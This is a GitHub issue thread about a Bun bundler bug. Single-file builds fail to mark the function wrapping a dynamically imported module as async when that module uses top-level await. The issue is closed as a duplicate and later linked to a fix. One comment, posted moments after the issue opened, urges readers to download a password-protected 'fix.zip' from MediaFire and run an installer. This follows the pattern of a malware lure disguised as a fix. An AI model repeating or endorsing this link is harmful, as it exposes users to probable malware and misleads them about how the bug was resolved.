### ISSUE TITLE
Missing async of imported dynamic modules on build

### ISSUE THREAD

**Issue by lugrinder** [oven-sh/bun#13607] opened 2024-08-29 14:45 UTC
### What version of Bun is running?

1.1.27

### What platform is your computer?

Microsoft Windows NT 10.0.19045.0 x64

### What steps can reproduce the bug?

Dynamically import a module with an `async` call in the root of the imported module.
Build the project into only one file (without `--splitting`).
The created function to replace the module, doesn't declare the function `async`, causing error.
Works fine If the project is build with the `--splitting` option.

### What is the expected behavior?

Add `async` to the function if the imported module has any `async` call in the root.

### What do you see instead?

Async not added to the function and the error: `"await" can only be used inside an "async" function`

### Additional information

You can see a very simple example at [github](https://github.com/lugrinder/bun).

**Comment by jungminjun824** [comment] 2024-08-29 14:45
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Aarav-Juneja** [comment] 2024-08-29 15:01
Duplicate of #12508

**Closed as completed** 2024-08-29 15:04 UTC
Labels: bug, bundler, windows, needs triage

**Comment by Jarred-Sumner** [comment] 2024-08-29 22:40
(Marking as duplicate)

**Comment by Jarred-Sumner** [comment] 2024-09-30 23:51
Fixed by @snoglobe in https://github.com/oven-sh/bun/pull/14218
